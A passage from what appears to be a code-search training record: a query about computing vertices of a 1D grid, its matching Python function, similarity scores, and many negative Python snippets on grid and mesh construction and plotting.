x_0=0.0, x_1=1.0):\n\n assert n>0\n\n\n points = x_0 + (x_1 - x_0)*numpy.arange(n+1,dtype=numpy.float)/n\n boundary = {(0, 0): 'left', (n-1, 1): 'right'}\n\n return points, boundary", "def _nd_plot_grid(self, **kwargs):\n\n from matplotlib.lines import Line2D\n from pesummary.core.plots.publication import pcolormesh\n\n # only add to corner plot if plotting on an existing figure\n if \"fig\" not in kwargs:\n raise TypeError(\n \"Can only add Grid results to an existing corner plot showing samples\"\n )\n\n colors = kwargs.pop(\"colors\")\n\n fig = kwargs.pop(\"fig\")\n ax = fig.axes\n\n quantiles = kwargs.pop(\"quantiles\", None)\n grid2d = kwargs.pop(\"grid2d\", False)\n\n for i, (label, grid) in enumerate(self._grids.items()):\n plotkwargs = {}\n plotkwargs[\"color\"] = colors[i]\n plotkwargs[\"label\"] = label\n\n axidx = 0\n for j, param in enumerate(self.parameters):\n x = grid[0].sample_points[param]\n pdf = np.exp(\n grid[0].marginalize_ln_posterior(not_parameters=param) - grid[1]\n )\n\n ax[axidx].plot(x, pdf, **plotkwargs)\n\n if quantiles is not None:\n low, high = self._credible_interval_grid(\n grid[0], param, interval=quantiles\n )\n ax[axidx].axvline(low, color=colors[i], ls=\"--\")\n ax[axidx].axvline(high, color=colors[i], ls=\"--\")\n\n # plot 2D posteriors\n if grid2d:\n meshkwargs = {}\n meshkwargs[\"zorder\"] = kwargs.get(\"zorder\", -10)\n meshkwargs[\"shading\"] = kwargs.get(\"shading\", \"gouraud\")\n\n if \"cmap\" not in kwargs:\n if colors[i] in COLOR_MAP:\n meshkwargs[\"cmap\"] = COLOR_MAP[colors[i]]\n else:\n meshkwargs[\"cmap\"] = kwargs[\"cmap\"]\n\n for k in range(j + 1, self._num_parameters):\n y = grid[0].sample_points[self.parameters[k]]\n density = np.exp(\n grid[0].marginalize_ln_posterior(\n not_parameters=[param, self.parameters[k]]\n )\n - grid[1]\n )\n\n # set orientation of the 2D grid\n p1idx = grid[0].parameter_names.index(param)\n p2idx = grid[0].parameter_names.index(self.parameters[k])\n if p1idx < p2idx:\n # transpose density\n density = density.T\n\n axyidx = axidx + (k - j) * self._num_parameters\n pcolormesh(x, y, density, ax=ax[axyidx], **meshkwargs)\n\n axidx += self._num_parameters + 1\n\n # update the legend\n handles = []\n for legtext, leghandle in zip(\n fig.legends[0].texts, fig.legends[0].legendHandles\n ):\n label = legtext.get_text()\n legcolor = leghandle.get_color()\n\n handles.append(Line2D([], [], color=legcolor, label=label))\n\n for i, label in enumerate(self._grids):\n for line in ax[0].get_lines():\n linecolor = line.get_color()\n # test that colours are the same\n if linecolor == colors[i]:\n handles.append(Line2D([], [], color=linecolor, label=label))\n break\n\n # remove original legend\n fig.legends = []\n\n # re-add legend\n fig.legend(handles=handles, frameon=False, loc=\"upper right\")\n\n return fig", "def create_grid(self):\n # Domain definition\n network = pp.FractureNetwork2d(self.frac_pts.T, self.frac_edges.T, domain=self.box)\n gb = network.mesh(self.mesh_args) \n pp.contact_conditions.set_projections(gb)\n\n self.gb = gb\n self.Nd = self.gb.dim_max()\n self._Nd = self.gb.dim_max()\n g2d = self.gb.grids_of_dimension(2)[0]\n self.min_face = np.copy(self.mesh_size) #np.min(g2d.face_areas)\n self.min_cell = np.min(g2d.cell_volumes)\n self.p, self.t = analysis.adjustmesh(g2d, self.tips, self.GAP)\n self.displacement = self.p*0\n self.fa_no = g2d.face_nodes.indices.reshape((2, g2d.num_faces), order='f').T \n return gb", "def test_init_multigrid():\n\n img_dim = (500, 750)\n h = 64\n\n # expected grid\n xv, yv = (np.arange(0, img_dim[1], h),\n np.arange(0, img_dim[0], h))\n x_exp, y_exp = np.meshgrid(xv, yv)\n\n # actual\n amg = mg.MultiGrid(img_dim, h, WS=127)\n x_act, y_act = amg.x, amg.y\n\n assert np.allclose(x_act, x_exp.ravel())\n assert np.allclose(y_act, y_exp.ravel())", "def cloudy_grid_surface(**kwargs):\n\n p = copy.copy(params)\n for key,val in kwargs.items():\n setattr(p,key,val)\n\n cloudy_library = clo.library()\n model_number_matrix,grid_table = cloudy_library._restore_grid_table(grid_ext=p.grid_ext)\n\n fig = plt.figure(figsize=(10,7))\n ax = plt.axes(projection='3d')\n\n key1, key2 = list(p.cloudy_param.keys())[0],list(p.cloudy_param.keys())[1]\n value1, value2 = list(p.cloudy_param.values())[0],list(p.cloudy_param.values())[1]\n\n # Decide on what goes on x and y axis\n cloudy_parameters = np.array(['NH','FUV','hden','Z'])\n x_index = cloudy_parameters[(cloudy_parameters != key1) &\\\n (cloudy_parameters != key2)][0]\n y_index = cloudy_parameters[(cloudy_parameters != key1) &\\\n (cloudy_parameters != key2)][1]\n\n # Cut in grid table\n grid_table_cut = grid_table.iloc[np.where((grid_table[key1].values == value1) & \\\n (grid_table[key2].values == value2))[0]]\n x, y = grid_table_cut[x_index].values, grid_table_cut[y_index].values\n X, Y = np.meshgrid(np.unique(grid_table_cut[x_index].values), np.unique(grid_table_cut[y_index].values))\n\n # Plot line ratio?\n if '_' in p.line:\n L1 = grid_table_cut[p.line.split('_')[0]].values\n L2 = grid_table_cut[p.line.split('_')[1]].values\n L2[L2 == 0] = 1e9\n line_lum = (L1/L2).astype(float)\n vmin = np.min(np.log10(line_lum[L2 < 1e9]))\n\n else:\n line_lum = grid_table_cut[p.line].values.astype(float)\n vmin = np.min(np.log10(line_lum[line_lum > 0]))\n\n lum = np.log10(line_lum)\n lum = lum.reshape([len(np.unique(x)), len(np.unique(y))]).T\n\n # ########## Patching the grid !!\n # line_lum[np.isnan(line_lum)] = -1 # what are these?\n # # 0 values: not sure if we have any?\n # line_lum[line_lum == 0] = np.min(line_lum[line_lum > 0])\n # # Negative numbers: missing grid point\n # i_missing = np.where(line_lum < 0)[0]\n # while len(i_missing) > 0:\n # lum = np.log10(line_lum)\n # for i in i_missing:\n # # print(lum[i-1],lum[i+1])\n # try: \n # lum[i] = (lum[i-1] + lum[i+1])/ 2\n # except:\n # pass\n # # print('he',np.isnan(lum[i]))\n # if np.isnan(lum[i]):\n # try:\n # lum[i] = lum[i-1] \n # except:\n # pass\n # if np.isnan(lum[i]):\n # try:\n # lum[i] = lum[i+1] \n # except:\n # pass \n # line_lum[i] = 10.**lum[i]\n # # print(i,lum[i])\n # i_missing = np.where(line_lum < 0)[0]\n # ########## End of patching\n\n\n # pdb.set_trace()\n ax.plot_surface(X, Y, lum, cmap=\"autumn_r\", vmin=vmin, lw=0, rstride=1, cstride=1,alpha=0.8)\n\n ax.set_xlabel('\\n\\n' + getlabel('l'+x_index))\n ax.set_ylabel('\\n\\n' + getlabel('l'+y_index))\n\n try:\n ax.set_zlabel('\\n\\n' + getlabel('l%s' % p.line))\n except:\n ax.set_zlabel('\\n\\n log ' + p.line.replace('_','/'))\n\n\n ax.scatter(x[line_lum > 10.**vmin],y[line_lum > 10.**vmin],np.log10(line_lum[line_lum > 10.**vmin]),\\\n 'o',c=np.log10(line_lum[line_lum > 10.**vmin]),cmap='autumn_r',s=50)\n\n # print(x)\n # print(line_lum)\n ax.view_init(30, p.angle)\n\n if p.savefig:\n if not os.path.isdir(p.d_plot + 'look-up/'): os.mkdir(p.d_plot + 'look-up/') \n plt.savefig(p.d_plot + 'look-up/cloudy_grid_%s.%s' % (p.line, p.format), format=p.format, dpi=300) \n # pdb.set_trace()", "def g2Dto1Dgrid(g2D, grid, average_grid=False):\n\n g2D = np.array(g2D)\n grid = np.array(grid)\n\n g1D_dic = DictList() # hash table of radii and values at radii\n\n for i in range(g2D.shape[0]):\n for j in range(g2D.shape[1]):\n g1D_dic[grid[i, j]] += [g2D[i, j]]\n\n g1D = np.array(list(map(\n lambda radius: [radius, np.mean(g1D_dic[radius])],\n sorted(g1D_dic))))\n\n if not(average_grid): return g1D\n\n g2D_cylindrical = np.zeros(grid.shape)\n for radius, mean_g in zip(*np.transpose(g1D)):\n for i, j in zip(*np.where(grid == radius)):\n g2D_cylindrical[i, j] = mean_g\n\n return g1D, g2D_cylindrical", "def _build_quadrant_indices(self, xval: Union[np.ndarray, da.Array], yval: Union[np.ndarray, da.Array]):\n\n xmin, ymin = self.mins\n xmax, ymax = self.maxs\n xmid = (0.5 * (xmin + xmax)).astype(xmin.dtype)\n ymid = (0.5 * (ymin + ymax)).astype(ymin.dtype)\n\n # split the data into four quadrants\n xval_lessthan = xval <= xmid\n xval_greaterthan = xval >= xmid\n yval_lessthan = yval <= ymid\n yval_greaterthan = yval >= ymid\n\n idx = np.array(self.index)\n index_q0 = idx[xval_lessthan & yval_greaterthan].tolist() # top left\n index_q1 = idx[xval_greaterthan & yval_greaterthan].tolist() # top left\n index_q2 = idx[xval_lessthan & yval_lessthan].tolist() # top left\n index_q3 = idx[xval_greaterthan & yval_lessthan].tolist() # top left\n\n return index_q0, index_q1, index_q2, index_q3, xmin, xmax, ymin, ymax, xmid, ymid", "def create_grid(grid):\r\n for i in range (4):\r\n grid.append ([])\r\n for j in range (4):\r\n grid[i].append (0)", "def make_grid(lat_values, lon_values, np_lat, np_lon):\n \n coordsys = iris.coord_systems.RotatedGeogCS(np_lat, np_lon)\n \n latitude = iris.coords.DimCoord(lat_values,\n standard_name='latitude',\n units='degrees_north',\n coord_system=coordsys)\n longitude = iris.coords.DimCoord(lon_values, \n standard_name='longitude',\n units='degrees_east',\n coord_system=coordsys)\n\n dummy_data = numpy.zeros((len(lat_values), len(lon_values)))\n new_cube = iris.cube.Cube(dummy_data, dim_coords_and_dims=[(latitude, 0), (longitude, 1)])\n \n return new_cube", "def create_square_triangle_mesh():\n vertices = np.array(\n ((0, 0, 0), (1, 0, 0), (0, 1, 0), (1, 1, 0), (0.5, 0.5, 0)),\n dtype=np.float32)\n faces = np.array(\n ((0, 1, 4), (1, 3, 4), (3, 2, 4), (2, 0, 4)), dtype=np.int32)\n return vertices, faces", "def create_square_grid(self, len_side_a, len_side_b):\n if (len_side_a < 2) or (len_side_b < 2):\n raise ValueError('side length attributes for HexagonalCells should be at least 2.')\n\n self.connections, self.weights = create_grid_square_cells(len_side_a, len_side_b)\n self.shape = (len_side_a, len_side_b)\n\n # populate the dictionary from cell coordinates to cell indexes in arrays connection and weights\n for i in range(len_side_a):\n for j in range(len_side_b):\n self.dict_cell_id_to_ind[(i, j)] = j + i*len_side_b", "def get_grid_mesh_coordinates(bbox, spacings=(1,1,1), dot_spacing=1, include_borderline=True):\n\n xmin,xmax,ymin,ymax,zmin,zmax = bbox\n\n xdim, ydim, zdim = (xmax+1-xmin, ymax+1-ymin, zmax+1-zmin)\n\n xs = np.arange(0, xdim, spacings[0])\n ys = np.arange(0, ydim, spacings[1])\n zs = np.arange(0, zdim, spacings[2])\n\n vol = np.zeros((ydim, xdim, zdim), np.bool)\n xs = xs.astype(np.int)\n ys = ys.astype(np.int)\n zs = zs.astype(np.int)\n xs = xs[(xs >= 0) & (xs < xdim)]\n ys = ys[(ys >= 0) & (ys < ydim)]\n zs = zs[(zs >= 0) & (zs < zdim)]\n if include_borderline:\n if 0 not in xs:\n xs = np.r_[0, xs, xdim-1]\n else:\n xs = np.r_[xs, xdim-1]\n if 0 not in ys:\n ys = np.r_[0, ys, ydim-1]\n else:\n ys = np.r_[ys, ydim-1]\n if 0 not in zs:\n zs = np.r_[0, zs, zdim-1]\n else:\n zs = np.r_[zs, zdim-1]\n for y in ys:\n vol[y, xs, ::dot_spacing] = 1\n vol[y, ::dot_spacing, zs] = 1\n for x in xs:\n vol[ys, x, ::dot_spacing] = 1\n vol[::dot_spacing, x, zs] = 1\n for z in zs:\n vol[ys, ::dot_spacing, z] = 1\n vol[::dot_spacing, xs, z] = 1\n\n ys, xs, zs = np.nonzero(vol)\n\n return np.c_[xs, ys, zs] + (xmin,ymin,zmin)", "def eval_2d_mesh(xmin, ymin, xmax, ymax, nx, ny, eval_fun):\n if xmin > xmax:\n raise ValueError(\"xmin (%.2f) was greater than\"\n \"xmax (%.2f)\" % (xmin, xmax))\n if ymin > ymax:\n raise ValueError(\"ymin (%.2f) was greater than\"\n \"ymax (%.2f)\" % (xmin, xmax))\n if nx < 1 or ny < 1:\n raise ValueError(\"nx (%.2f) or ny (%.2f) was less than 1\" % (nx, ny))\n X = np.linspace(xmin, xmax, nx)\n lenx = len(X)\n Y = np.linspace(ymin, ymax, ny)\n leny = len(Y)\n X, Y = np.meshgrid(X, Y)\n Z = np.zeros((leny, lenx))\n for i in range(leny):\n for j in range(lenx):\n Z[i][j] = eval_fun(np.array([X[i][j], Y[i][j]]))\n return (X, Y, Z)", "def create_grid(grid):\r\n inner = [0]*4\r\n for i in range(4):\r\n grid.append(inner[:])", "def mesh2grid(v, x, z):\n lx = x.max() - x.min()\n lz = z.max() - z.min()\n nn = v.size\n mesh = _stack(x, z)\n\n nx = np.around(np.sqrt(nn*lx/lz))\n nz = np.around(np.sqrt(nn*lz/lx))\n dx = lx/nx\n dz = lz/nz\n\n # construct structured grid\n x = np.linspace(x.min(), x.max(), nx)\n z = np.linspace(z.min(), z.max(), nz)\n X, Z = np.meshgrid(x, z)\n grid = _stack(X.flatten(), Z.flatten())\n\n # interpolate to structured grid\n V = scipy.interpolate.griddata(mesh, v, grid, 'linear')\n\n # workaround edge issues\n if np.any(np.isnan(V)):\n W = scipy.interpolate.griddata(mesh, v, grid, 'nearest')\n for i in np.where(np.isnan(V)):\n V[i] = W[i]\n\n return np.reshape(V, (nz, nx))", "def create_grid_and_edges(data, drone_altitude, safety_distance):\n # minimum and maximum north coordinates\n north_min = np.floor(np.min(data[:, 0] - data[:, 3]))\n north_max = np.ceil(np.max(data[:, 0] + data[:, 3]))\n\n # minimum and maximum east coordinates\n east_min = np.floor(np.min(data[:, 1] - data[:, 4]))\n east_max = np.ceil(np.max(data[:, 1] + data[:, 4]))\n\n # given the minimum and maximum coordinates we can\n # calculate the size of the grid.\n north_size = int(np.ceil(north_max - north_min))\n east_size = int(np.ceil(east_max - east_min))\n\n # Initialize an empty grid\n grid = np.zeros((north_size, east_size))\n # Initialize an empty list for Voronoi points\n points = []\n # Populate the grid with obstacles\n for i in range(data.shape[0]):\n north, east, alt, d_north, d_east, d_alt = data[i, :]\n if alt + d_alt + safety_distance > drone_altitude:\n obstacle = [\n int(np.clip(north - d_north - safety_distance - north_min, 0, north_size-1)),\n int(np.clip(north + d_north + safety_distance - north_min, 0, north_size-1)),\n int(np.clip(east - d_east - safety_distance - east_min, 0, east_size-1)),\n int(np.clip(east + d_east + safety_distance - east_min, 0, east_size-1)),\n ]\n grid[obstacle[0]:obstacle[1]+1, obstacle[2]:obstacle[3]+1] = 1\n # add center of obstacles to points list\n points.append([north - north_min, east - east_min])\n\n graph = Voronoi(points)\n\n edges = []\n for v in graph.ridge_vertices:\n p1 = graph.vertices[v[0]]\n p2 = graph.vertices[v[1]]\n cells = list(bresenham(int(p1[0]), int(p1[1]), int(p2[0]), int(p2[1])))\n hit = False\n\n for c in cells:\n if np.amin(c) < 0 or c[0] >= grid.shape[0] or c[1] >= grid.shape[1]:\n hit = True\n break\n if grid[c[0], c[1]] == 1:\n hit = True\n break\n\n if not hit:\n p1 = (p1[0], p1[1])\n p2 = (p2[0], p2[1])\n edges.append((p1, p2))\n\n return grid, edges, int(north_min), int(east_min)", "def create_uniform_grid(low, high, bins=(10, 10)):\n grid = [np.linspace(low[dim], high[dim], bins[dim] + 1)[1:-1]\n for dim in range(len(bins))]\n\n return grid", "def cell_edges3d_cartesian(self, axis2, axis3):" ]
[ "0.72705615", "0.6971521", "0.6954679", "0.694505", "0.694505", "0.6930976", "0.6930976", "0.6930976", "0.6930976", "0.6908422", "0.6903842", "0.69015664", "0.6880629", "0.6800234", "0.6800234", "0.6661612", "0.6625001", "0.66245806", "0.63171464", "0.62140924", "0.6175486", "0.6159924", "0.61487824", "0.61355203", "0.60373604", "0.6009462", "0.60068315", "0.59965444", "0.5980873", "0.59378344", "0.5906833", "0.5882443", "0.5866265", "0.5855601", "0.5835231", "0.58020157", "0.5783776", "0.5743535", "0.5742318", "0.57405406", "0.57229644", "0.56922287", "0.567624", "0.5627061", "0.5599888", "0.559854", "0.5594069", "0.5590157", "0.5577149", "0.5573161", "0.5566499", "0.556102", "0.55513567", "0.55420184", "0.5538299", "0.5516979", "0.5504284", "0.55003315", "0.5471656", "0.546918", "0.5468522", "0.5466755", "0.5466003", "0.5461426", "0.5443951", "0.5437529", "0.54198724", "0.54185784", "0.5415632", "0.5411417", "0.54050976", "0.53861713", "0.5384879", "0.5365452", "0.53611004", "0.53562725", "0.535349", "0.53505725", "0.53472", "0.5345733", "0.5341903", "0.5338834", "0.5337922", "0.53370667", "0.53318197", "0.5329653", "0.5322349", "0.5301423", "0.53008676", "0.52967274", "0.5292623", "0.52850217", "0.5280276", "0.5275985", "0.52757245", "0.5275482", "0.5274125", "0.52725124", "0.5265923", "0.52649" ]
0.56618655
43
Get vertices dividing a 1d grid.
def get_1d_vertices(grid, cut_edges=False): if len(grid.shape) > 1: raise ValueError("grid must be 1d array.") diff = np.diff(grid) vert = np.zeros(grid.size+1) # Interior vertices: halfway between points vert[1:-1] = grid[0:-1] + diff/2 # Edge vertices: tight or reflect if cut_edges: vert[0] = grid[0] vert[-1] = grid[-1] else: vert[0] = grid[0] - diff[0]/2 vert[-1] = grid[-1] + diff[-1]/2 return vert
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def vertices(self):\n try:\n return self._vertices\n except:\n self._vertices = [list(x) for x in self.vertex_generator()]\n return self._vertices", "def vertices(self):\n\n if self._faces is None:\n if self._vertices is None:\n return None\n self.triangulate()\n return self._vertices", "def vertices(self) -> list[Point]:\n first_polygon_index = self.rank - max(self.pdim - 1, 1) - 1\n new_shape = self.shape[:first_polygon_index] + (-1, self.shape[-1])\n array = self.array.reshape(new_shape)\n return list(distinct(Point(x, copy=False) for x in np.moveaxis(array, -2, 0)))", "def vertices(self):\n return self._vertices", "def get_vertices(self):\n return self.vertices", "def get_vertices(self):\n return self.vertices", "def vertices(self):\n return self.pointlist", "def get_vertices(self):\n return self._vertices", "def vertices(self):\n return list(self._graph)", "def _vertices(self, point):\n vertex_0, vertex_1, vertex_2 = tuple(\n gs.take(point, indices=self.faces[:, i], axis=-2) for i in range(3)\n )\n if point.ndim == 3 and vertex_0.ndim == 2:\n vertex_0 = gs.expand_dims(vertex_0, axis=0)\n vertex_1 = gs.expand_dims(vertex_1, axis=0)\n vertex_2 = gs.expand_dims(vertex_2, axis=0)\n return vertex_0, vertex_1, vertex_2", "def vertexes(self):\n theta = self.orientation\n shifts = np.array([np.cos(theta), np.sin(theta)]) * self.a\n return self.coords + (shifts[:, None] * [-1, 1]).T", "def get_vertices(self, crs=None):\n if (crs is None) or (crs is self.crs):\n return np.array(self.vertices)\n else:\n vertices = [_reproject(v[:2], self.crs, crs)\n for v in self.vertices]\n return np.array(vertices)", "def vertices(self):\n d = self.space_dimension()\n v = vector(ZZ, d)\n points = []\n for g in self.minimized_generators():\n for i in range(0,d):\n v[i] = g.coefficient(Variable(i))\n v_copy = copy.copy(v)\n v_copy.set_immutable()\n points.append(v_copy)\n return tuple(points)", "def get_vertices(self):\n\n return self._vertices", "def get_vertices(self, crs=None):\n if crs is None:\n vertices = []\n for poly_vertices in self.vertices:\n vertices.append([np.array(v) for v in poly_vertices])\n return vertices\n else:\n vertices = []\n for poly_vertices in self.vertices:\n poly = []\n for ring_vertices in poly_vertices:\n poly.append(np.array([_reproject(v[:2], self.crs, crs)\n for v in ring_vertices]))\n vertices.append(poly)\n return vertices", "def get_vertices(self):\n vertices = []\n V = [[-self.base_vectors[:,n], self.base_vectors[:,n]] for n in range(self.base_vectors.shape[1])]\n combs = list(itertools.product(*V))\n for cb in combs:\n cb = np.sum(np.array(cb).T, axis=1, keepdims=True)\n vertices.append(self.base_vertices + cb)\n\n vertices = np.concatenate(vertices,axis=1)\n return vertices", "def get_vertices(self, crs=None):\n if crs is None:\n return [np.array(v) for v in self.vertices]\n else:\n vertices = []\n for line in self.vertices:\n line_vertices = [_reproject(v[:2], self.crs, crs) for v in line]\n vertices.append(np.array(line_vertices))\n return vertices", "def get_vertices(self):\n return self.vertList.keys()", "def vertices(self):\n return self.keys()", "def vertices(self):\n return list(self.__graph.values())", "def vertices(self):\n return map(Vertex, self._top_exp.vertices())", "def mesh(self):\n return numpy.meshgrid(*self.edges, indexing='ij')", "def get_vertices(self):\n return list(self.vertices.keys())", "def meshgrid(self):\n vecs = self.coord_vecs\n return np.meshgrid(*vecs, indexing='ij')", "def grid_coords(self):\n return [(x, y) for y in range(self.height) for x in range(self.width)]", "def get_vertices(self):\n return self.graph.keys()", "def get_all_vertices(self):\r\n for vertex in self.__neighbours.keys():\r\n yield vertex", "def vertices(self) -> list[Point]:\n a = Point(self.array[..., 0, :], copy=False)\n b = Point(self.array[..., 1, :], copy=False)\n return [a, b]", "def _build_grid(self):\n n = self.params['n']\n\n x_min, x_max = min(self.node[:, 0]), max(self.node[:, 0])\n y_min, y_max = min(self.node[:, 1]), max(self.node[:, 1])\n xv = np.linspace(x_min, x_max, num=n, endpoint=True)\n yv = np.linspace(y_min, y_max, num=n, endpoint=True)\n xg, yg = np.meshgrid(xv, yv, sparse=False, indexing='xy')\n\n return xg, yg", "def make_complete_graph(num_vertices):\n V = num_vertices\n K = V * (V - 1) // 2\n grid = np.zeros([3, K], np.int32)\n k = 0\n for v2 in range(V):\n for v1 in range(v2):\n grid[:, k] = [k, v1, v2]\n k += 1\n return grid", "def obtener_vertices(self):\n return list(self.vertices.keys())", "def getVertices(self):\n return self.vertexIndex", "def vertices(tri, vertex_list):\n dim = len(vertex_list[0])\n p = numpy.zeros((3, dim))\n for j in range(3):\n p[j] = vertex_list[tri[j]]\n return p", "def edges_as_vertices(self) -> Iterable[Tuple[Vec3, Vec3]]:\n v = self.vertices\n for edge in self.edges:\n yield v[edge[0]], v[edge[1]]", "def vertices(self):\r\n return self.adjacent.keys()", "def cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n part = Partition(list(self))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def p2vertices(self, p):\n h = self.top\n verts = np.empty((self.nparams + 2, 2))\n verts[:, 0] = self._modelx\n verts[:, 1] = np.concatenate([[h], p, [h]])\n return verts", "def makeStartingGrid(self):\n return util.make2DArray(self.xN, self.yN, False)", "def vertices(self):\n return list(self.graph_dict.keys())", "def cube_vertices(x, y, z, nx, ny=None, nz=None):\n if ny == None: ny = nx\n if nz == None: nz = nx\n return [\n x - nx, y + ny, z - nz, x - nx, y + ny, z + nz, x + nx, y + ny, z + nz, x + nx, y + ny, z - nz, # top\n x - nx, y - ny, z - nz, x + nx, y - ny, z - nz, x + nx, y - ny, z + nz, x - nx, y - ny, z + nz, # bottom\n x - nx, y - ny, z - nz, x - nx, y - ny, z + nz, x - nx, y + ny, z + nz, x - nx, y + ny, z - nz, # left\n x + nx, y - ny, z + nz, x + nx, y - ny, z - nz, x + nx, y + ny, z - nz, x + nx, y + ny, z + nz, # right\n x - nx, y - ny, z + nz, x + nx, y - ny, z + nz, x + nx, y + ny, z + nz, x - nx, y + ny, z + nz, # front\n x + nx, y - ny, z - nz, x - nx, y - ny, z - nz, x - nx, y + ny, z - nz, x + nx, y + ny, z - nz, # back\n ]", "def get_vertices(self):\n if self.vert_list.keys() != None:\n return self.vert_list.keys()\n raise KeyError(\"Vertex not found\")", "def get_vertices(self) -> []:\n return [i for i in self.adj_list]", "def getSpatialGrid(self, scaled=True):\n if scaled:\n return np.meshgrid(self.x_axis_scaled, self.x_axis_scaled)\n else:\n return np.meshgrid(self.x_axis_unscaled, self.x_axis_unscaled)", "def vertices_from_lines(lines):\n count = len(lines)\n print(\"Getting vertices 1/3\")\n pb = pbar.ProgressBar(count)\n vertices = []\n# print(\"getting vertices from line\")\n for line in lines:\n pb +=1\n vertices.extend(list(line.coords))\n del pb\n return [Point(p) for p in set(vertices)]", "def grids(self):\n x = self.xvalues\n if self.ndim == 1:\n return x\n if self.ndim == 2:\n return x[None, :], x[:, None]\n if self.ndim == 3:\n return x[None, :, None], x[:, None, None], x[None, None, :]", "def vertices(self):\r\n return list(self.__graph_dict.keys())", "def get_cell_vertices(self, i, j):\n self._copy_cache = False\n cell_verts = [(self.xvertices[i, j], self.yvertices[i, j]),\n (self.xvertices[i, j+1], self.yvertices[i, j+1]),\n (self.xvertices[i+1, j+1], self.yvertices[i+1, j+1]),\n (self.xvertices[i+1, j], self.yvertices[i+1, j]),]\n self._copy_cache = True\n return cell_verts", "def cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n spart_star = self.star()\n part = Partition(list(spart_star))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertex_ids(self):\n return self.get_ids()", "def cube_vertices(x, y, z, n):\r\n return [\r\n x-n,y+n,z-n, x-n,y+n,z+n, x+n,y+n,z+n, x+n,y+n,z-n, # top\r\n x-n,y-n,z-n, x+n,y-n,z-n, x+n,y-n,z+n, x-n,y-n,z+n, # bottom\r\n x-n,y-n,z-n, x-n,y-n,z+n, x-n,y+n,z+n, x-n,y+n,z-n, # left\r\n x+n,y-n,z+n, x+n,y-n,z-n, x+n,y+n,z-n, x+n,y+n,z+n, # right\r\n x-n,y-n,z+n, x+n,y-n,z+n, x+n,y+n,z+n, x-n,y+n,z+n, # front\r\n x+n,y-n,z-n, x-n,y-n,z-n, x-n,y+n,z-n, x+n,y+n,z-n, # back\r\n ]", "def _fragment(div, eps):\n grids = []\n for lat in range(div):\n for log in range(div):\n init = [(1.0 / div) * lat, (1.0 / div) * log]\n end = [(1.0 / div) * (lat + 1) + 2 * eps,\n (1.0 / div) * (log + 1) + 2 * eps]\n end2 = [(1.0 / div) * (lat + 1), (1.0 / div) * (log + 1)]\n grids.append([init, end, end2])\n return grids", "def uvgrid(self):\n if self.baselines_type != \"grid_centres\":\n ugrid = np.linspace(-self.uv_max, self.uv_max, self.n_uv + 1) # +1 because these are bin edges.\n return (ugrid[1:] + ugrid[:-1]) / 2\n else:\n # return the uv\n return self.baselines", "def grid_adjacent(vertex):\n\tx, y = vertex\n\tadj = []\n\n\tif x > 0:\n\t\tadj.append((x-1, y))\n\tif x < GRID_WIDTH-1:\n\t\tadj.append((x+1, y))\n\tif y > 0:\n\t\tadj.append((x, y-1))\n\tif y < GRID_HEIGHT-1:\n\t\tadj.append((x, y+1))\n\n\treturn adj", "def non_rotated_vertices(self):\n v0 = [self.pos.x - self.width / 2, self.pos.y - self.height / 2]\n v1 = [self.pos.x + self.width / 2, self.pos.y - self.height / 2]\n v2 = [self.pos.x + self.width / 2, self.pos.y + self.height / 2]\n v3 = [self.pos.x - self.width / 2, self.pos.y + self.height / 2]\n return v0, v1, v2, v3", "def calc_grid(self):\n return int(self._posn.x / cell_size), int(self._posn.y / cell_size)", "def _get_all_vertices(self, ref_frame='WORLD') -> np.ndarray:\n\n\t\tdepsgraph = bpy.context.evaluated_depsgraph_get() # to account for deformations\n\n\t\tif ref_frame not in {'LOCAL', 'WORLD'}:\n\t\t\traise ValueError(f\"Invalid ref_frame: {ref_frame}. Must be one of ['LOCAL', 'WORLD']\")\n\n\t\tverts = []\n\n\t\tfor mesh in self._meshes:\n\n\t\t\t# use bmesh to get vertices - this accounts for deformations in depsgraph\n\t\t\tbm = bmesh.new()\n\t\t\tbm.from_object(mesh, depsgraph)\n\t\t\tbm.verts.ensure_lookup_table()\n\t\t\tmesh_verts = np.array([x.co for x in bm.verts])\n\t\t\tbm.free()\n\n\t\t\tif ref_frame == 'WORLD':\n\t\t\t\tmesh_verts = np.dot(mesh.matrix_world, np.vstack((mesh_verts.T, np.ones(mesh_verts.shape[0]))))\n\n\t\t\tverts.append(mesh_verts)\n\n\t\tverts = np.concatenate(verts, axis=1)\n\t\tverts /= verts[3] # convert from homogeneous coordinates\n\t\treturn verts[:3].T", "def getVertexNumbers(self):\n return self.vertexIndex.keys()", "def faces_as_vertices(self) -> Iterable[List[Vec3]]:\n v = self.vertices\n for face in self.faces:\n yield [v[index] for index in face]", "def grid(self) -> aa.Grid2D:\r\n return self.analysis.dataset.grid", "def vis_grid(Xs):\n (N, H, W, C) = Xs.shape\n A = int(ceil(sqrt(N)))\n G = np.ones((A * H + A, A * W + A, C), Xs.dtype)\n G *= np.min(Xs)\n n = 0\n for y in range(A):\n for x in range(A):\n if n < N:\n G[y * H + y:(y + 1) * H + y, x * W + x:(x + 1) * W + x, :] = Xs[n, :, :, :]\n n += 1\n # normalize to [0,1]\n maxg = G.max()\n ming = G.min()\n G = (G - ming) / (maxg - ming)\n return G", "def make_grid(self):\n\n\t\tinit_grid = (self.grid_width//2, self.grid_height//2)\n\t\tgrid_list = []\n\n\t\tfor i in range(self.canv_width//self.grid_width):\n\t\t\tfor j in range(self.canv_height//self.grid_height):\n\t\t\t\tif j == 0 or j%2 ==0:\n\t\t\t\t\tgrid_list.append((init_grid[0]+i*self.grid_width, init_grid[1]+j*self.grid_height))\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tgrid_list.append((grid_list[-1][0]+(self.grid_width//2), init_grid[1]+j*self.grid_height))\n\n\t\treturn grid_list", "def all_cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n spart_star = self.circle_star()\n part = Partition(list(spart_star))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def vertices(self):\n s = set([x for x in self.edges.keys()])\n t = set([y for v in self.edges.values() 